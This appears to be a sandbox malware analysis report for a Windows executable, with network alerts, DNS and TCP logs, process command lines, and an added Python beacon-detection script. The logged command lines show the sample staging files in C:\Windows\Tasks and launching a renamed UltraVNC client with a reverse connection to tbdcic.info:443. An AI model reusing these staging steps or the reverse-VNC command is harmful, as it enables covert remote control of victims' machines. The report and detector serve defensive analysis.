KERNEL32.dll | SetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
MSVCRT.dll | ??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall
Language of compilation system | Country where language is spoken | Map
Russian | Russia
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T13:31:29.416752+0100 | 2035893 | ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon | 1 | 192.168.2.5 | 49995 | 194.190.152.201 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 13:29:25.698333979 CET | 49732 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:25.698395967 CET | 443 | 49732 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:29:25.698508978 CET | 49732 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:25.701783895 CET | 49732 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:25.701812983 CET | 443 | 49732 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:29:25.701863050 CET | 443 | 49732 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:29:26.066232920 CET | 49733 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:26.066351891 CET | 443 | 49733 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:29:26.066472054 CET | 49733 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:26.066684961 CET | 49733 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:26.066720963 CET | 443 | 49733 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:29:26.066822052 CET | 443 | 49733 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:29:37.491010904 CET | 49767 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:37.491040945 CET | 443 | 49767 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:29:37.491184950 CET | 49767 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:37.491295099 CET | 49767 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:29:37.491306067 CET | 443 | 49767 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:29:37.491354942 CET | 443 | 49767 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:30:00.052040100 CET | 49817 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:30:00.052083015 CET | 443 | 49817 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:30:00.052166939 CET | 49817 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:30:00.052311897 CET | 49817 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:30:00.052326918 CET | 443 | 49817 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:30:00.052365065 CET | 443 | 49817 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:30:38.747237921 CET | 49900 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:30:38.747277975 CET | 443 | 49900 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:30:38.747376919 CET | 49900 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:30:38.747534037 CET | 49900 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:30:38.747550011 CET | 443 | 49900 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:30:38.747603893 CET | 443 | 49900 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:31:29.413110018 CET | 49995 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:31:29.413145065 CET | 443 | 49995 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:31:29.413346052 CET | 49995 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:31:29.415520906 CET | 49995 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:31:29.415534973 CET | 443 | 49995 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:31:29.415570974 CET | 443 | 49995 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:31:29.416752100 CET | 49995 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:31:29.416760921 CET | 443 | 49995 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:32:26.032320023 CET | 49996 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:32:26.032458067 CET | 443 | 49996 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:32:26.032573938 CET | 49996 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:32:26.032876015 CET | 49996 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:32:26.032915115 CET | 443 | 49996 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:32:26.032969952 CET | 443 | 49996 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:33:41.069360971 CET | 49997 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:33:41.069408894 CET | 443 | 49997 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:33:41.073542118 CET | 49997 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:33:41.073542118 CET | 49997 | 443 | 192.168.2.5 | 194.190.152.201
Dec 23, 2024 13:33:41.073586941 CET | 443 | 49997 | 194.190.152.201 | 192.168.2.5
Dec 23, 2024 13:33:41.073776007 CET | 443 | 49997 | 194.190.152.201 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 13:29:19.946660042 CET | 51962 | 53 | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 13:29:25.092390060 CET | 49739 | 53 | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 13:29:25.513472080 CET | 53 | 49739 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 13:29:19.946660042 CET | 192.168.2.5 | 1.1.1.1 | 0x12fe | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:29:25.092390060 CET | 192.168.2.5 | 1.1.1.1 | 0xd2a9 | Standard query (0) | tbdcic.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 13:29:20.087773085 CET | 1.1.1.1 | 192.168.2.5 | 0x12fe | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 13:29:21.908349037 CET | 1.1.1.1 | 192.168.2.5 | 0xe2ad | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:29:21.908349037 CET | 1.1.1.1 | 192.168.2.5 | 0xe2ad | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:29:25.513472080 CET | 1.1.1.1 | 192.168.2.5 | 0xd2a9 | No error (0) | tbdcic.info | | 194.190.152.201 | A (IP address) | IN (0x0001) | false
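The Suricata alert fires on one packet of one connection; what the TCP table itself shows is eight connections from the sandbox host to 194.190.152.201:443 (resolved from tbdcic.info) over about four minutes, with the gap between connections growing each time. The Python below is an added example, not part of the Joe Sandbox report, that reconstructs that view from a packet log: it keeps the earliest client-side packet per connection, groups connections by server endpoint and reports the inter-connection gaps. The sample log is transcribed from the table above (first client packet per connection, a few replies, one repeat packet; timestamps truncated to microseconds). The client network prefix and the flagging thresholds (at least five connections, monotone backoff or a coefficient of variation under 0.5) are assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample transcribed from the report's TCP packet table, as
# "date time sport dport sip dip" (timestamps truncated to microseconds).
PACKET_LOG = """\
2024-12-23 13:29:25.698333 49732 443 192.168.2.5 194.190.152.201
2024-12-23 13:29:25.698395 443 49732 194.190.152.201 192.168.2.5
2024-12-23 13:29:26.066232 49733 443 192.168.2.5 194.190.152.201
2024-12-23 13:29:37.491010 49767 443 192.168.2.5 194.190.152.201
2024-12-23 13:29:37.491040 443 49767 194.190.152.201 192.168.2.5
2024-12-23 13:30:00.052040 49817 443 192.168.2.5 194.190.152.201
2024-12-23 13:30:38.747237 49900 443 192.168.2.5 194.190.152.201
2024-12-23 13:31:29.413110 49995 443 192.168.2.5 194.190.152.201
2024-12-23 13:31:29.416752 49995 443 192.168.2.5 194.190.152.201
2024-12-23 13:32:26.032320 49996 443 192.168.2.5 194.190.152.201
2024-12-23 13:33:41.069360 49997 443 192.168.2.5 194.190.152.201
"""

CLIENT_PREFIX = "192.168.2."  # the sandbox host's network (assumption used for the direction filter)


def parse_packets(text):
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, clock, sport, dport, sip, dip = line.split()
        ts = datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S.%f")
        rows.append((ts, int(sport), int(dport), sip, dip))
    return rows


def connection_starts(rows, client_prefix=CLIENT_PREFIX):
    """Earliest client-side packet per (client port, server ip, server port)."""
    starts = {}
    for ts, sport, dport, sip, dip in rows:
        if not sip.startswith(client_prefix):
            continue  # replies never open a connection
        key = (sport, dip, dport)
        if key not in starts or ts < starts[key]:
            starts[key] = ts
    return starts


def beacon_profile(starts):
    """Per server endpoint: number of connections and the gaps between them."""
    per_server = defaultdict(list)
    for (_, dip, dport), ts in starts.items():
        per_server[(dip, dport)].append(ts)
    profile = {}
    for server, times in per_server.items():
        times.sort()
        gaps = [round((b - a).total_seconds(), 3) for a, b in zip(times, times[1:])]
        profile[server] = {"connections": len(times), "gaps_s": gaps,
                           "span_s": round((times[-1] - times[0]).total_seconds(), 3)}
    return profile


def flag_beacons(profile, min_connections=5, max_cv=0.5):
    """Flag endpoints contacted repeatedly at fixed or steadily growing intervals."""
    flagged = {}
    for server, p in profile.items():
        gaps = p["gaps_s"]
        if p["connections"] < min_connections:
            continue
        backoff = all(b >= a for a, b in zip(gaps, gaps[1:]))  # every gap >= the previous one
        mean = sum(gaps) / len(gaps)
        cv = (sum((g - mean) ** 2 for g in gaps) / len(gaps)) ** 0.5 / mean if mean else 0.0
        if backoff or cv < max_cv:
            flagged[server] = dict(p, pattern="backoff" if backoff else "fixed-interval", cv=round(cv, 2))
    return flagged


def analyse(text=PACKET_LOG):
    return flag_beacons(beacon_profile(connection_starts(parse_packets(text))))


if __name__ == "__main__":
    for (ip, port), info in analyse().items():
        print(f"{ip}:{port}: {info['connections']} connections over {info['span_s']}s, "
              f"{info['pattern']} pattern, gaps {info['gaps_s']}")
```

On the report's data this yields one flagged endpoint with a backoff pattern: gaps of roughly 0.4, 11, 23, 39, 51, 57 and 75 seconds. A fixed-interval check alone would miss it, which is why the function tests for monotone growth as well as low variance.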

Target ID: 0
Start time: 07:29:06
Start date: 23/12/2024
Path: C:\Users\user\Desktop\7q551ugrWe.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\7q551ugrWe.exe"
Imagebase: 0x400000
File size: 1'664'495 bytes
MD5 hash: D61940626FAD051067BFD16F2AB4E657
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 2
Start time: 07:29:07
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:29:07
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:29:07
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 07:29:07
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 07:29:07
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 07:29:08
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 07:29:08
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout /t 1
Imagebase: 0xac0000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 07:29:09
Start date: 23/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Imagebase: 0x7ff686a00000
File size: 5'641'176 bytes
MD5 hash: 24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 07:29:09
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout /t 1
Imagebase: 0xac0000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 07:29:10
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: taskkill /f /im sync_browser.exe
Imagebase: 0xca0000
File size: 74'240 bytes
MD5 hash: CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 07:29:10
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout /t 2
Imagebase: 0xac0000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 13
Start time: 07:29:10
Start date: 23/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase: 0x7ff6413e0000
File size: 3'581'912 bytes
MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 15
Start time: 07:29:11
Start date: 23/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1760,i,4170063215735319094,17128991866469409438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase: 0x7ff6413e0000
File size: 3'581'912 bytes
MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

                                                                  Target ID:16
                                                                  Start time:07:29:12
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:07:29:13
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 2
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:07:29:16
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\Tasks\sync_browser.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Tasks\sync_browser.exe
                                                                  Imagebase:0x7ff6dc0c0000
                                                                  File size:1'945'368 bytes
                                                                  MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:false

                                                                  Target ID:19
                                                                  Start time:07:29:16
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 8
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:07:29:24
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\Tasks\sync_browser.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
                                                                  Imagebase:0x7ff6dc0c0000
                                                                  File size:1'945'368 bytes
                                                                  MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.2276683914.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:07:29:24
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 2
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:07:29:26
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 4
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:07:29:30
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 42
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false


Execution Graph

Execution Coverage: 18.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 26.4%
Total number of Nodes: 1626
Total number of Limit Nodes: 16
9698 4060b7 9696->9698 9697->9682 9700 4013a9 2 API calls 9698->9700 9699->9675 9703 4060c3 7 API calls 9700->9703 9701->9689 9704 404f67 9 API calls 9703->9704 9707 40610c 9704->9707 9705->9563 9706->9689 9708 406116 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9708 9709 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9709 9708->9563 9709->9545 9709->9563 9713 406599 9710->9713 9714 40656b 9710->9714 9711->9689 9712->9689 9716 40133e 2 API calls 9713->9716 10062 404545 9714->10062 9719 4065a7 9716->9719 9718->9689 9723 4041c4 16 API calls 9719->9723 9722 4013a9 2 API calls 9724 406588 ??3@YAXPAX 9722->9724 9725 4065b0 9723->9725 9734 4065d0 9724->9734 9728 4065c1 ??3@YAXPAX 9725->9728 9732 4013a9 2 API calls 9725->9732 9726->9563 9731 408dbf 57 API calls 9727->9731 9728->9734 9729->9563 9730->9689 9733 40652c ??3@YAXPAX ??3@YAXPAX 9731->9733 9732->9728 9733->9563 9735 40661a 9734->9735 9736 40660d 9734->9736 10294 40851f 9735->10294 10075 40172c ??2@YAPAXI 9736->10075 9739 406616 9740 406657 9739->9740 9741 40662c 9739->9741 9742 4045f4 22 API calls 9740->9742 10302 4044b0 9741->10302 9743 40665c 9742->9743 9746 406c4d 9743->9746 9747 401458 2 API calls 9743->9747 9749 406cc5 9746->9749 9750 4026b0 lstrcmpW 9746->9750 9748 40667a 9747->9748 9793 40668d 9748->9793 10306 404a41 9748->10306 9752 406d08 ??3@YAXPAX ??3@YAXPAX 9749->9752 9758 4026b0 lstrcmpW 9749->9758 9756 406c7e 9750->9756 9753 406d21 9752->9753 9754 406d27 ??3@YAXPAX 9752->9754 9753->9754 9757 404513 4 API calls 9754->9757 9755 401458 ??2@YAPAXI ??3@YAXPAX 9755->9793 9756->9749 10373 404497 9756->10373 9759 406d38 ??3@YAXPAX ??3@YAXPAX 9757->9759 9760 406ce4 9758->9760 9759->9518 9760->9752 9763 406cf1 9760->9763 9767 40133e 2 API calls 9763->9767 9764 4066bc 9768 406ae3 ??3@YAXPAX ??3@YAXPAX 9764->9768 9769 4066c9 9764->9769 9765 4026b0 lstrcmpW 9765->9793 9766 407ce8 22 API calls 9771 406cba 9766->9771 9773 406d00 9767->9773 9772 406bec 9768->9772 9770 4048c7 2 API calls 9769->9770 
